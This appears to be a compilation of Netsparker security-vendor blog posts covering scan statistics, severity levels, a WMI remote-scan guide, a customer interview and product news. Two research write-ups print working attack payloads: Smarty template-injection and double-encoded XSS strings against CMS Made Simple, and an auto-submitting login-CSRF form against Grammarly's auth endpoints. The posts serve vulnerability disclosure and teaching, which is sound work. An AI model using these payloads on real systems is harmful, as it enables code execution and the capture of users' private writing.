
Infographic: Statistics About the Security State of 104 Open Source Web Applications


Infographic highlighting the state of security of 104 open source web applications

Every year we publish a number of statistics about the vulnerabilities that the Netsparker web application security scanner automatically identified in open source web applications. Netsparker is a heuristic web application security scanner, so all of these vulnerabilities were identified heuristically, not with signatures. Here are the numbers for the scans and research we did in 2016.

Why Do We Use Open Source Web Applications for Testing?

We use open source web applications to test our dead accurate web vulnerability scanning technology because of their diversity. You can find any type of web application you can dream of in the open source community: forums, blogs, shopping carts, social network platforms and so on. You can also find applications written in almost every development language available, such as PHP, Java, Ruby on Rails and ASP.NET. In fact, in 2016 we further diversified our test lab and included more web applications built with NodeJS, Python and similar frameworks.

The other reason we use open source web applications is that, while testing, we can also give something back to the community. By scanning these web applications and reporting the 0-day vulnerabilities back to the developers, we help open source developers write more secure code.

In fact, we are so committed to helping open source project developers that we also give free Netsparker Cloud accounts to all open source web developers.

Open Source Web Applications, Vulnerabilities & Numbers for 2016

How Many Web Applications and Vulnerabilities?

In 2016 we scanned 104 web applications and identified 129 vulnerabilities in 31 of them. Therefore 29.8% of the scanned web applications had one or more web application vulnerabilities in them.

How Many 0-Day Vulnerabilities Did Netsparker Identify?

During our test scans in 2016, we identified 31 0-day vulnerabilities and published 27 advisories, 6 of which were published in 2017. We do not always publish an advisory because it is not always possible to do so; unfortunately, sometimes there are simply too many things that restrict us from publishing one.

What About the Other Vulnerabilities?

The other 98 vulnerabilities that the Netsparker web vulnerability scanner identified were known vulnerabilities which have not been fixed yet. We keep a record of these vulnerabilities for two reasons:

  1. To measure the effectiveness of the automated scanner: if there are known vulnerabilities and the scanner does not identify them, it means we are not doing a good enough job. The good news is that Netsparker not only identified all the known vulnerabilities, but also uncovered 31 0-days.
  2. Even though these are known vulnerabilities, they have not been fixed in the latest version of the software in question, so anyone installing these web applications will be vulnerable.

Are We Seeing More Secure Web Applications?

In both 2015 and 2016, we published fewer advisories than we did in 2014. Does that mean that we are seeing more secure web applications? The answer is both yes and no.

Yes, because some of the web application projects that have been around for years are becoming more secure. Their developers have more experience and are learning from the community. WordPress is a perfect example of this; the WordPress core is very secure.

At the same time, new open source web applications are released almost daily, and even though it is not a certainty, the chances of a newly developed web application having a vulnerability are very high. So there will always be a good number of vulnerable web applications out there.

Trivia: 26 of the scanned web applications were WordPress plugins, 8 of which had vulnerabilities.

Most Common Web Application Vulnerabilities in Open Source Web Applications for 2016

Which were the most common identified web application vulnerabilities in the open source web applications we scanned? Here are the numbers:

The top two culprits are Cross-site Scripting and SQL Injection vulnerabilities, with XSS accounting for a staggering 81.9% of the identified vulnerabilities. This is not unusual; last year we had similar results, with 180 XSS and 55 SQL Injection vulnerabilities.

Web Security Automation is the Key

According to the above numbers, a vulnerable web application had, on average, around four vulnerabilities (129 vulnerabilities across 31 applications). Malicious hackers are definitely happy with the a la carte selection of vulnerabilities they have at their disposal.

This is somewhat expected, considering that the average modern web application has hundreds, if not thousands, of possible attack surfaces. Web applications are becoming really complex, and unless you automate security, it is impossible to develop a secure web application. Some people might not agree, but how can you, as a web application developer, manually check that every possible attack surface on your web application is not vulnerable to hundreds of different vulnerability variants?

You definitely cannot, and automation is the key here. That’s what we are focusing on at Netsparker. We do not just develop a scanner; we are developing a web application security solution that generates dead accurate web security scan results, so you do not have to waste time manually verifying the findings.

Free Web Application Security Scans for Open Source Projects

Take advantage of our offering and build more secure web applications. As an open source developer, you can get a free Netsparker Cloud account so you can automatically scan your open source web applications for vulnerabilities. Some open source projects, such as OpenCart, are already benefiting from free web application security scans.


Web Application Vulnerabilities Severities Explained


What are vulnerability severities?

Netsparker web application security scanner scans for a wide variety of vulnerabilities in websites, web applications and web services.

Each vulnerability has a different impact; some need to be addressed urgently, while others are less of a priority. For example, a SQL Injection vulnerability should definitely be prioritised over an internal IP address disclosure.

To help you better decide which vulnerabilities should be fixed first, Netsparker categorises them in its scans and reports. This article defines the following types of vulnerabilities:

  • Critical
  • Important
  • Medium
  • Low

In addition, there are Informational Alerts. For further information, see our full list of web vulnerability checks.


Critical Severity Web Vulnerabilities

This section explains how we define and identify web vulnerabilities of Critical severity.

Critical Severity Example

This is what a report of a Critical severity vulnerability looks like in Netsparker web application security scanner.

Critical Severity Example

Impacts of Critical Severity Web Application Vulnerabilities

The impacts of Critical severity vulnerabilities are as follows:

  1. These vulnerabilities can allow attackers to take complete control of your web applications and web servers. In exploiting this type of vulnerability, attackers could carry out a range of malicious acts including (but not limited to):
  • Stealing information (for example, user data)
  • Tricking your users into supplying them with sensitive information (for example, credit card details)
  • Defacing your website
  2. By exploiting a critical severity vulnerability, attackers can access your web application's database. This allows them to acquire user and administrator information that they could use to delete or modify other user accounts.
  3. By exploiting such vulnerabilities, attackers can access and control logged-in user or administrator accounts, enabling them to hijack accounts and make changes that typically only those users can.

Suggested Action for Critical Severity Vulnerabilities

A Critical severity vulnerability means that your website can be hacked at any time. You should make it your highest priority to fix these vulnerabilities immediately. Once you fix them, rescan the website to make sure they have been eliminated.

    Important Severity Web Application Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Important severity.

    Important Severity Example

    This is what a report of an Important severity vulnerability looks like in Netsparker.

    Important Severity Example

    Impacts of Important Severity Vulnerabilities

    1. Attackers can find other vulnerabilities, and potentially your database passwords, by viewing your application's source code.
    2. On exploiting such vulnerabilities, attackers can view information about your system that helps them find or exploit other vulnerabilities that enable them to take control of your website and access sensitive user and administrator information.

    Suggested Action for Important Severity Vulnerabilities

An Important severity vulnerability means that your website can be hacked, and that hackers can find other vulnerabilities which have a bigger impact. Fix these types of vulnerabilities immediately. Once you fix them, rescan your website to make sure they have been eliminated.

    Medium Severity Web Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Medium severity.

    Medium Severity Example

    This is what a report of a Medium severity vulnerability looks like in Netsparker.

    Medium Severity Example

    Impacts of Medium Severity Vulnerabilities

    1. Attackers can access a logged-in user account to view sensitive content.
2. By exploiting these security issues, attackers can gain access to information that helps them exploit other vulnerabilities, or better understand your system so they can refine their attacks.

    Suggested Action for Medium Severity Vulnerabilities

Most of the time, since the impact of Medium severity vulnerabilities is not direct, you should first focus on fixing Critical and Important severity vulnerabilities. However, Medium severity vulnerabilities should still be addressed at the earliest possible opportunity.

    Low Severity Web Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Low severity.

    Low Severity Example

    This is what a report of a Low severity vulnerability looks like in Netsparker.

    Low Severity Example

    Impacts of Low Severity Vulnerabilities

Do not overly concern yourself if your website has Low severity vulnerabilities. These types of issues do not have any significant impact and are not exploitable.

    Suggested Action For Low Severity Vulnerabilities

If time and budget allow, it is worth investigating and fixing Low severity vulnerabilities.

    Informational Alerts

    This section explains how we define and use Informational Alerts.

    Informational Alerts

    Impacts of Informational Alerts

    We do not even call these alerts vulnerabilities. They are reported simply for your information as a website owner.

    Suggested Action for Informational Alerts

    No action or fix is required. It is just sometimes good to know about things that are on your web application such as: NTLM Authorization Required, Database Detected (MySQL), Robots.txt Detected, phpMyAdmin Detected or Out-of-date Version (jQuery).

    Live Demo: Exploiting Apache Struts Vulnerabilities


    Our CEO, Ferruh Mavituna, and Security Researcher, Sven Morgenroth, joined Paul Asadoorian in episode #143 of Hack Naked News.

During the show, Ferruh discusses the possible causes of the infamous Equifax hack and the resulting breach of hundreds of millions of records of cardholder data. Even though it was initially thought that a deserialization vulnerability in the REST plugin of Apache Struts was the main cause, an OGNL Expression Injection (CVE-2017-5638) published in March was the root cause of the breach. Therefore, our Security Researcher, Sven, gave a live demo of how to find and exploit several OGNL Expression Injection vulnerabilities in Struts.

    Demo: Identifying and Exploiting OGNL Expression Injection Vulnerabilities

    During the demo, Sven also used Netsparker Web Application Security Scanner to highlight how easy it is to automatically find these types of vulnerabilities when you use the correct tools. Watch the full Hack Naked News episode #143.

    You can also skip directly to Ferruh’s discussion of the Equifax hack, and Sven’s explanation of OGNL Expression Injection vulnerabilities and how to identify and exploit them.

    Netsparker Will Be Exhibiting at Gartner Symposium/ITxpo in Barcelona 2017


    Gartner Symposium/ITxpo 2017

    This year Netsparker will exhibit at the Gartner Symposium/ITxpo Conference 2017 in Barcelona, Spain. The event will be held from the 5th to the 9th of November at the Centre Convencions Internacional Barcelona.

    Come and visit us at our booth to talk about web application security and our dead accurate web application vulnerability scanner that can identify vulnerabilities in any type of modern web application, regardless of the architecture it is built with.

Make sure not to miss our famed merchandise; come and check out the goodies we have for you at our booth this year. For more information, visit the Gartner Symposium/ITxpo website for a copy of the agenda.

    Get a €600 Discount on the Gartner Symposium/ITxpo Conference Ticket

    Use the discount code GSSYM103 when buying your Gartner Symposium/ITxpo Conference Ticket to get a €600 discount.

    Triggering Netsparker Desktop Scans Remotely With Windows Management Instrumentation


This article explains how to trigger Netsparker Desktop web application security scans remotely over a Local Area Network (LAN), by connecting to the remote machine via Windows Management Instrumentation (WMI) and running Netsparker on it.

      1. Adding the Netsparker File Path to the Environment Variables
      2. Triggering Netsparker Web Security Scans Remotely
      3. Security Best Practice

    Adding the Netsparker File Path to the Environment Variables

    First, you must add the Netsparker file path to the PATH system variable.

How to Add the Netsparker File Path to the Environment Variables

1. In the Windows Start menu, type 'environment', then click Edit the system environment variables. The Environment Variables dialog is displayed.

2. In the System variables section, select Path, then click Edit. The Edit environment variable dialog is displayed.

3. In the Edit environment variable dialog, click New to add Netsparker's file path. Enter the file path, and click OK.
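
Alternatively, the same change can be scripted. Here is a minimal sketch from an elevated PowerShell prompt; the installation path below is an assumption, so adjust it to your environment:

# Append the Netsparker installation folder to the machine-level PATH variable.
$netsparkerDir = 'C:\Program Files (x86)\Netsparker'
$machinePath   = [Environment]::GetEnvironmentVariable('Path', 'Machine')
if ($machinePath -notlike "*$netsparkerDir*") {
    [Environment]::SetEnvironmentVariable('Path', "$machinePath;$netsparkerDir", 'Machine')
}

After updating the PATH, open a new command prompt so that the change takes effect.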

    Triggering Netsparker Web Security Scans Remotely

    There are two ways to trigger web security scans remotely. In these examples, scans are initiated remotely using default settings. If you want to scan a website using non-default configuration, see Netsparker Desktop Command Line Interface and Arguments.

    How to Trigger Web Security Scans Remotely (First Method)

    These commands run with the authority of the currently logged-in user. They allow Netsparker to run on a remote machine and to scan the target with a default policy via WMI.

    1. Open PowerShell or CMD and enter this code:

    wmic /node:"REMOTE_COMPUTER_NAME or IP Address" process call create 'cmd /c Netsparker /a /url http[s]://TARGET_URL /rt "REPORT TYPE" /r "YOUR_REPORT_FILE_PATH"'

Command Example Without User Information

    wmic /node:"192.168.244.125" process call create 'cmd /c Netsparker /a /url http://php.testsparker.com /rt "Detailed Scan Report" /r "C:\Users\Sparker\Desktop\report_phptestsparkercom.html"'

    How to Trigger Web Security Scans Remotely (Second Method)

    These commands run with the authority of a different user. They will run Netsparker on a remote machine in order to scan the target with a default policy via WMI.

As in the first method, you use WMI to trigger the process on the remote machine. WMI is built into the Windows operating system; it is used to create a remote connection from the command line, and we use it to trigger a command over that remote connection.

    1. Open PowerShell or CMD and enter this code:

    wmic /node:"REMOTE_COMPUTER_NAME or IP Address"  /user:YOURDOMAIN\USERNAME /password:"USERPASSWORD" process call create 'cmd /c Netsparker /a /url http[s]://TARGET_URL /rt "REPORT TYPE" /r "YOUR_REPORT_FILE_PATH"'

    Command Example with User Information

    wmic /node:"192.168.244.125" /user:Net\Sparker /password:"LongLiveTheSparkers!" process call create 'cmd /c Netsparker /a /url http://php.testsparker.com /rt "Detailed Scan Report" /r "C:\Users\Sparker\Desktop\report_phptestsparkercom.html"'
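
If you prefer native PowerShell over wmic, a roughly equivalent call would look like the following sketch; it reuses the same example host, target and report path as above, which are placeholders for your own values:

# Prompt for the remote user's credentials, then start Netsparker on the remote machine via WMI.
$cred = Get-Credential
Invoke-WmiMethod -ComputerName "192.168.244.125" -Credential $cred `
    -Class Win32_Process -Name Create `
    -ArgumentList 'cmd /c Netsparker /a /url http://php.testsparker.com /rt "Detailed Scan Report" /r "C:\Users\Sparker\Desktop\report_phptestsparkercom.html"'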

    Security Best Practice

As a security best practice, you could define a dedicated user with fewer privileges on your domain. This makes it easier to audit the related processes on the network, and you can still connect to remote machines using that account and run scans without specifying the username and password in the command (as in the first method).

The user you define only needs Domain User authority on the domain, together with Admin privileges on the local machine, to run web security scans.

    Netsparker's 2016 in Review


2016 was a great year for Netsparker! We were the first (and only) web application security scanner vendor to introduce a number of cutting-edge technologies that make it possible to scale up web scanning and easily scan hundreds or thousands of websites, without having to spend hours configuring complex tools and days verifying that the vulnerabilities the scanner has detected are not false positives.

In 2016, we also introduced monthly updates for our web application security scanner, and we were featured in a number of interviews on popular podcasts and more, as highlighted in this overview post.

    Automating and Scaling Up Web Vulnerability Scanning

The first Netsparker update we released in 2016 focused on automation and scalability. We developed features in the scanner to help users automate much more of both the pre-scan (configuration) and post-scan (results verification) stages. The February 2016 update of the Netsparker scanner included:

• Automatic recognition and configuration of URL rewrite rules: you do not need to know the URL rewrite configuration of the target, or configure the scanner accordingly, for it to crawl and scan all the parameters on the target website.

• Proof-Based Scanning Technology: a technology that automatically generates a proof of exploit for the identified vulnerabilities, so you do not have to verify them manually. Here is a short two-minute video on how this technology works, which we also produced in 2016.

In the February 2016 update of the Netsparker web application security scanner, we also released the following:

    Monthly Web Security Scanner Updates

Since April 2016, we have released monthly updates of both Netsparker web scanner editions. The advantage of monthly releases is that you do not have to wait four, five or more months to start using a new feature. If a feature is developed, it means it is needed and it will help you automate more, so we release it as soon as it is ready. Below are some of the highlights from the 2016 product updates:

    Apart from all the new features and scanner improvements, every month we are introducing new web vulnerability checks and improving the existing ones. We are also frequently adding new security checks such as checks for Subresource Integrity and Content Security Policy, to help you build more secure web applications.

    Free Netsparker Cloud Scans, Interviews and More from Netsparker

In 2016, we also announced that free Netsparker Cloud web vulnerability scans are available for open source projects. Several open source projects are already benefitting from this campaign, including OpenCart, which is featured in this web security case study.

Our CEO Ferruh Mavituna was also interviewed several times during 2016, starting with an interview at RSA in San Francisco in which he explains what Netsparker is, followed by four more interviews on the popular security show Paul’s Security Weekly. You can watch all the interviews from the links below:

We also hosted a webcast with our friends from Denim Group on how to optimize your application security program with Netsparker and ThreadFix.

    What’s in Store for Netsparker Web Security Scanner in 2017?

In 2016, we pushed the boundaries of what we can automate in web application security. For 2017, the mantra will be the same: continue improving the cloud-based and desktop editions of our web application security scanner in terms of features, ease of use, automation and scanning capabilities.

    ProfitKeeper Automates Web Application Security with Netsparker


    “We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.”

Who can tell it better than the customer himself? This is not an ordinary case study; it is an interview with Tom Mallory, ProfitKeeper’s IT Ninja. In this interview, Mr Mallory explains why he chose Netsparker Web Application Security Scanner and how it helped him improve the security posture of the web applications that he manages.

    What Can You Tell Us About ProfitKeeper and Your Role?

    When you wear as many hats as I do, I think the only option is to refer to yourself as an IT Ninja. Right?

    ProfitKeeper has been in business for over 13 years, teaming with franchisors to help them increase their profits. Although we provide services to very large, established franchises, we pride ourselves in individualized attention to all our partners no matter the size.

    From a technical standpoint, we’re in the Finance/Analytics industry because that is the type of data we’re working with. But we’re also in the customer service business in the sense that we have clients/customers who trust and rely upon not only the data we provide them but also our ability to keep that data safe.

    Can you tell us a bit about your web environment and applications?

Our web applications are built with .NET. They run on Microsoft’s IIS web server and use Microsoft SQL Server as the database backend. We currently manage three web applications that are responsible for generating data surrounding KPIs, royalty reporting, business accounting and payroll.

    What Made You Decide to Try Netsparker Web Application Security Scanner?

We have been using Netsparker for about a year now. It’s essentially the first time that we’ve relied upon a third-party automated web application security scanner to perform a thorough penetration test.

    A major point of attraction, at least initially, was the number of positive reviews. We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.

    Once we dove into using Netsparker (which right now is about once per week) we were impressed by the ease of setup and ongoing use. I wish I could comment on support but we haven’t really had any issues to speak of.

    Believe it or not, in the years prior to using Netsparker we were performing all of our testing manually. You don’t really realize how much time and effort an automated web application security scanner can save you until you try it. Moving back to a manual process seems unfathomable at this point in time.

    A large part of our decision to begin using Netsparker came from our long-term acknowledgement that we need to do everything in our power to ensure that our clients’ data is safe and secure.

    With both personally identifiable information and financials being at risk, we already understood the importance of continually minimizing the ways in which a malicious hacker could access critical information.

    How Has Netsparker Helped to Reduce Security Vulnerabilities?

    As you know, performing manual penetration testing is an arduous process. Netsparker not only makes us faster but also better. Netsparker, and the automation it provides, has allowed us to make our processes as efficient as possible while building more secure web applications.

One feature we really like, which also helped us significantly reduce the probability of human error, is the Proof-Based Scanning Technology, which automatically verifies the identified vulnerabilities. That’s a lifesaver for me, because I do not need to know how to reproduce every vulnerability that’s out there.

As regards the findings in our web applications, although we found our code to be free of vulnerabilities, Netsparker helped to confirm this, in addition to allowing us to find areas of code that had the potential to cause security issues such as SQL Injection vulnerabilities.

    An often overlooked benefit of Netsparker: It makes you more aware of areas that present the potential for security vulnerabilities.

    Would you like to add anything else?

Netsparker was extremely easy to set up and use, but provided world-class information on potential web application vulnerabilities that, if exposed, could cost us our company.

    Exploiting SSTI and XSS in the CMS Made Simple Web Application


    CMS Made Simple is a content management system that was first released in July 2004 as an open source General Public License (GPL) package. It is currently used in both commercial and personal projects.

    CMS Made Simple logo

    As Security Researchers working on the Netsparker web application vulnerability scanner, we're always excited about testing and scanning new open source web applications for vulnerabilities. Recently, I read researcher Osanda Malith's blog post, CMSMS 2.1.6 Multiple Vulnerabilities, where he explains his findings following a review of the CMS Made Simple source code. I decided to see for myself what I could uncover.

    The First Step: Noticing the Parameters in the URL

    After installing CMS on our local system, I was determined to try to find a vulnerability. Of course, from a black box point of view, a freshly installed application with default configuration lacks a lot of functionality. However, I decided to take a closer look.

    It didn't take long before I noticed the following URL in the address bar of the browser:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=Simplex%20News%20Detail&cntnt01returnid=1

    URL of note in the address bar of CMS made simple

    Finding so many parameters together in a URL always excites Security Researchers. Why? Well, the more parameters with different functionality you expose, the greater the number of potential attack surfaces.

    Manually Reviewing Potential Attack Surfaces

    At this point, I decided to take a closer look at the URL. If the purpose of a parameter is not obvious, and there is no alternative, changing the value of a particular parameter may be the quickest way to find out. For example, if any parameter value is displayed on the page, it's a good idea to check if it's vulnerable to Cross-site scripting (XSS) first.

    Let's look at what happened when I modified the cntnt01detailtemplate parameter value by adding =test.

As you might imagine, the entered string is expected to match a value in the back end; this error occurred even when I changed a single letter. I concluded that it was not a good idea to look for XSS there.

    Perhaps the Source Code Would Help Me Decide What To Do

    After quickly checking the source code to see why it generated an error, I could see that the value was related to the template detail, as the parameter name implies. It was built using Smarty Template Engine, which keeps content, functionality and templates separate. However, as we know, developers must be careful when using template engines, because if implemented incorrectly in applications, they can lead to critical security problems.

    I continued with the black box tests.

    Detecting and Exploiting Template Injection to Gain Remote Code Execution

    I decided to add a simple payload to the following URL (instead of 'Simplex News Detail') to help me see what was happening:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:Netsparker&cntnt01returnid=1

    I added, simply: =string:Netsparker. This displayed 'Netsparker' in the window.

    I then retested it with another payload:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{6*3}&cntnt01returnid=1

    I added: =string:{6*3}. Again, I was able to display a number in the window.

Most template engines have a 'sandboxed' mode to prevent you from going further. However, depending on the template engine used, it is sometimes possible to escape the sandbox and execute arbitrary code. In this case, exploiting unsandboxed Smarty was a simple matter:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}phpinfo();{/php}&cntnt01returnid=1

I added this: string:{php}phpinfo();{/php}. I was then able to see the output of the phpinfo() function, as displayed in the screenshot.

    What Did I Overlook During the Manual Audit?

Basically, what I was trying to do was observe the output following particular requests, or any particular user input, during manual tests. The input you observe, such as cntnt01detailtemplate, can produce different outputs for many reasons. It is very difficult to use manual testing to observe all possible behaviors. The cntnt01detailtemplate parameter did not initially reflect the changes I made to it. At this point, many Security Researchers would not waste further time searching for an XSS vulnerability on this parameter. In addition, sometimes there are simply too many prerequisites for a successful attack to occur, and you may need to test hundreds of possibilities for a single parameter to even detect all of these preconditions.

    This is a serious problem for security researchers – but not for the dead accurate web vulnerability scanner Netsparker.

    Netsparker Automatically Identified the XSS Vulnerability in the Same Parameter

To add insult to injury, the Server-Side Template Injection was not the only vulnerability in this parameter. There was an additional Cross-site Scripting vulnerability that could be triggered by double encoding the payload, because the urldecode function was used on that input value. This led to an XSS vulnerability, even though the special characters were encoded to HTML entities once they entered the application.

    This is the XSS vulnerability we found when we scanned the web application with Netsparker:

    XSS vulnerability

    Let's take a closer look at why we did not find this XSS vulnerability during the manual tests. Even when using a whitebox approach, the XSS was quite hard to find. This was because the developers used object-oriented programming (OOP) style with lots of interconnected classes, and put some of the application logic into templates. This makes it very hard to trace the code and find out where data enters and exits the web application.

    A Detailed Explanation of the Cross-site Scripting Vulnerability Identified in CMS Made Simple

    However, let me provide you with an overview of the vulnerability. The data enters the application in the lib/classes/class.moduleoperations.inc.php file in the function GetModuleParameters, where the $_REQUEST variable is processed. The code strips the prefix from the parameter values and returns the resulting values in the $params array.

    Following that, the parameters are sanitized against XSS in the lib/classes/class.CMSModule.php file, as shown.

    This should be sufficient to sanitize the parameters. However, it is always better to save the raw data and encode it, depending on the context in which it is used. As mentioned above, the vulnerability is in the detail template parameter, which is currently correctly sanitized.

    In the modules/News/action.detail.php file, the detailtemplate parameter is URL-decoded again, which ensures that the path to the template does not contain any URL-encoded characters. After all, the parameter is not intended to be printed, and should only be passed to a function that fetches the template. Even if it was printed, HTML special characters are still replaced with HTML entities.

    So far everything looks fine. The detailtemplate parameter is not printed anywhere, and is only used to load the template. The problem, however, is that there is no valid template with the name of our payload. Therefore an exception is thrown in the index.php file.

    The errorConsole function is located in the lib/classes/internal/class.Smarty_CMS.php file, and contains the following code.

    As you can see, $e->getMessage() is assigned to the template. However, the problem is that this contains the detailtemplate parameter, which was URL-decoded. When we look into the template located in the lib/assets/templates/cmsms-error-console.tpl file, it becomes apparent why only logged-in users, like administrators, are vulnerable to XSS.

The $loggedin template variable was assigned above and is only true if the user is logged in. The output of detailtemplate is in {$e_message}. As already mentioned, this is still encoded with htmlspecialchars(), even though urldecode() was already used to remove URL-encoded values.

The problem is that only certain special characters are sanitized by the htmlspecialchars() function, for example <, > and &. What it doesn't sanitize is the percent (%) character, which is the prefix of URL-encoded bytes. This means that if we double encode the value, by passing %253c in the template name, it will contain %3c instead of <.

    For example instead of <script>alert(1)</script>, we pass %253cscript%253ealert(1)%253c/script%253e as our payload. It does not contain any character that is encoded to an HTML entity, so it will be stored as %3cscript%3ealert(1)%3c/script%3e on the server side. However, once the urldecode() function is used on this value it will be decoded to <script>alert(1)</script> and therefore introduce an XSS vulnerability through double encoding.
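
As a minimal sketch of the pattern described above (a simplified flow, not the actual CMS Made Simple code, and the variable names are assumptions):

<?php
// The parameter arrives URL-decoded once by PHP, then is HTML-encoded on entry:
$template = htmlspecialchars($_REQUEST['cntnt01detailtemplate']); // %253cscript%253e... stays %3cscript%3e...

// Later, the error-handling path URL-decodes the value a second time before printing it:
$message = "Template '" . urldecode($template) . "' not found";    // %3c turns back into <

echo $message; // the double-encoded payload is now rendered as <script>...</script>

Because htmlspecialchars() never sees a literal < or >, the encoding step has nothing to escape, and the later urldecode() call reintroduces the dangerous characters.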

    The Importance of Automating the Vulnerability Assessment

    Even though the vulnerability is relatively easy to fix, it is very hard to find, even in a whitebox test. While it looks like everything is sanitized correctly, a decoding function combined with the right input can still lead to cross-site scripting.

    It is often easier to use an automated vulnerability scanner like Netsparker, since, as in this case, it can conduct a more thorough and accurate analysis of an application than a penetration tester. There are various reasons for this, one of which is the large codebase and the OOP style, which makes debugging harder. The other is the fact that testers usually have a limited amount of time in which they are able to analyse the application.

    Had the vulnerable CMS Made Simple versions been scanned with Netsparker before being published, the vulnerabilities could have been fixed before being deployed in any production environment.

    Since we know that open source projects are instrumental in providing secure applications to a broad range of customers, we supply free Netsparker cloud licenses to all open source web application developers.


    Black Friday All Year? Secure Websites Generate More Revenue Survey Shows


    Nowadays, many businesses understand the crucial importance of having a secure website. To keep their – and their customers' data – safe from hackers, they scan their web applications and web services for vulnerabilities, detecting and fixing them before malicious attackers find them.

    Many others, unfortunately, are either doing little or nothing in terms of website security, mainly because they think that their website is not a target. Others think security vendors are merely scaremongering. So, are we scaremongering or raising awareness? Is it true that insecure websites have a direct impact on the revenue of a business?

    We Surveyed Consumers About Website Security

Black Friday, Cyber Monday and the festive season, a period closely associated with food and shopping, are just a few days away. In our survey, the vast majority of respondents (84.6%) said that they do some of their shopping online.

    During the holidays, how often do you purchase gifts online?

    What's more, 45% of respondents revealed that over 50% of their shopping is done online. That’s a lot of online shopping!

    Consumers’ Concerns When Shopping Online

    In our survey, we asked respondents whether they had any concerns about the security of the online shops they buy from. Here are the results.

    What, if any, is your biggest concern during the holidays when shopping online?

Respondents were concerned about their credit card details being stolen if the online store was hacked or subject to a malware attack (77.6%). Both types of incidents happen because websites are insecure. This is not a surprising statistic, especially considering the widely reported Equifax data breach and several other similar incidents.

    Consumers’ Concerns Impact Online Retail Businesses

    These concerns have a direct impact on online businesses. For example, only 33.1% of online shoppers store their payment information on the website, as shown in the graph.

    When you make a purchase online, do you allow the website to save your credit card details and address?

    This has a direct impact on online retail businesses, because customers are more likely to buy and make additional purchases if they do not have to enter their payment details each time.

    Consumers Will Buy More When Reassured That The Online Store is Secure

    Respondents said that they were more likely to visit and buy from an online store if they knew it had good security measures in place and that their information was stored securely (67%).

    Businesses Should Invest in Website Security (and their Business)

    The results clearly show that when businesses invest in website security, and show their customers that they care about their privacy and confidential information, they are also investing in their business. Customers will be more inclined to make a purchase and conduct most of their shopping online.

    Getting Started in Web Security Is Easy

    If you are new to web application security, don’t worry. Getting started is really easy. With the Netsparker web application security scanner, within just a few minutes, you can easily and automatically find web application vulnerabilities that could leave your business and online store exposed.

    CSRF Vulnerability Allows Attackers To See Sensitive Data of Grammarly's Customers


    In the early days of the internet privacy was easier to maintain. If a website prompted you to enter your real name when registering, you had two choices. Either you would leave instantly, or you would provide a fake name, if access to the website was important to you.

Generally, you were careful about when and where you used your real name online. Websites lacked JavaScript, and every personal homepage had at least one colourful gif of a dancing animal.

    The Personal Data Problem on the Internet

    Now, if you try to register on one of the most popular sites on the internet with a fake name, you get instantly banned (see 'Facebook real-name policy controversy'). Messenger apps on your phone upload your whole address book to servers abroad. Many websites ask you for your name, email address, age and gender just to show you an article about a topic of interest.

    Not much of the internet we used to know is left. While this is shocking, the hard truth is, we are used to it. In our contemporary world, we sacrifice privacy for comfort and usability. Why even bother providing a fake name or using throwaway email addresses, when you can simply click 'Login with Facebook' for instant registration?

    Many websites store your private data on their servers. We do not mind this because it is convenient to have it there and it makes our online lives a little bit easier. We trust the services to be careful with our data and have measures in place to ensure that no malicious third party can access it.

    We actually place a vast amount of trust in the websites and services we use. One of them is a cloud service called Grammarly.

    What is Grammarly?

In 2017, according to Alexa, Grammarly is among the 800 most popular websites in the US. So what service does it provide that has helped it build such popularity?

    What is Grammarly?

The service provides plugins for three of the most popular browsers: Firefox, Safari and Chrome. Grammarly uses these plugins to analyse what you write in real time, and warns you immediately if you make a spelling, grammar or punctuation mistake. It also encourages good writing style. Here is how they describe their service on the Grammarly site:

    Whether you’re writing an important business email, a social media post, an essay, or an online dating profile, Grammarly will have your back...Grammarly helps you write mistake-free on Gmail, Facebook, Twitter, Tumblr, LinkedIn, and nearly anywhere else you write on the web.

    How Grammarly Works

While this sounds like a useful service, it comes with a problem. In order to analyze your writing, the plugins can read your emails, instant messages, online documents, and more. Whatever you do online, Grammarly is just waiting for you to make a mistake so that it can show you how to correct it.

    How Grammarly Works

    As soon as you log into the Grammarly service, the plugin starts to check what you write and saves it. It also analyses your writing and emails you a weekly summary report.

    Grammarly also analyses your writing and emails you a weekly summary report.

    The CSRF Attack on Grammarly

    It sounds harmless, doesn't it? After all, you are the only one who knows your password, and Grammarly will not share your data with anyone else.

    Let's assume attackers can't guess your strong and unique password. But, they still have other ways to get your data. Attackers do not need to log into your Grammarly account. They only need to silently log you into theirs!

    CSRF Attack Code

    This code shows the exploit attackers could use to carry out a Cross-Site Request Forgery (CSRF) attack.

    CSRF Attack Code
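
The original post showed the exploit as a screenshot. Below is a minimal sketch reconstructing its structure: the attacker's email address, password and form field names are assumptions, while the two endpoints are the ones discussed in this article. The line numbers referenced in the steps further down correspond to this sketch.

<html>
  <body>
    <!-- Silently log the victim out of their own Grammarly session -->
    <img style="display:none"
         src="https://auth.grammarly.com/v3/logout">
    <!-- Prepare a login form pointing at the attacker-controlled account -->
    <form id="csrf" method="POST" action="https://auth.grammarly.com/v3/login">
      <input type="hidden" name="email" value="attacker@example.com">
      <input type="hidden" name="password" value="attackers-password">
    </form>
    <!-- Submit the form automatically, without any user interaction -->
    <script>document.getElementById("csrf").submit();</script>
  </body>
</html>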

    CSRF protection would normally prevent other websites from logging you out of your account and logging you into a different, attacker-controlled, one. The problem was that there was no CSRF protection on either auth.grammarly.com/v3/logout or on the auth.grammarly.com/v3/login endpoint.

    Exploiting the CSRF Vulnerability in Grammarly

This is how an attacker would exploit the CSRF security issue in Grammarly. They would:

1. Host the CSRF attack code on their website
2. Prompt the victim to click the link to the exploit (by sending an email, instant message or Facebook post, for example)
3. Once the victim clicks the link, the code will:
   • Log the victim out by sending a request to https://auth.grammarly.com/v3/logout (line 5)
   • Prepare a form to submit to https://auth.grammarly.com/v3/login (line 7), which contains the attacker's email address (line 8) and password (line 9)
   • Automatically submit the form, without any user interaction, using JavaScript (line 12)
